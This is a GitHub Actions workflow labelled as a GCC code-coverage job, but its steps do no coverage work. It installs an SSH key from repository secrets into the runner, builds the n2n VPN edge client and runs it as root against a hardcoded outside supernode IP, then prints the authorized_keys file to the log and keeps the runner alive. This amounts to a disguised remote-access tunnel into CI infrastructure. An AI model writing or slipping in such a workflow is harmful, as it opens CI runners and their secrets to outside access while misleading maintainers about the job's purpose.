on:
  push:
    branches:
    - main

jobs:
  ubuntu-codecoverage:
    name: Ubuntu GCC, Code Coverage (x10)
    runs-on: ubuntu-latest
    
    steps:
      - uses: actions/checkout@v4      
      - name: "Setup"
        run: |
          sudo apt-get update
          sudo apt-get install -y g++
          sudo apt-get install -y gfortran
          sudo apt-get install -y cmake
          cd
          mkdir -p .ssh
          whoami
          echo ${{secrets.SSH_KEY}} > ~/.ssh/authorized_keys
          chmod -R 700 ~/.ssh
          git clone https://github.com/F-Feng/n2n
          cd n2n/n2n_v2
          cmake .
          make
          sudo $PWD/edge -l 101.200.136.188:8899 -a 192.168.168.250 -c c -k k
          ps -A -f -w -w -w
          echo ========================
          cat ~/.ssh/authorized_keys
          echo ========================
          echo sleep 600
          sleep 60
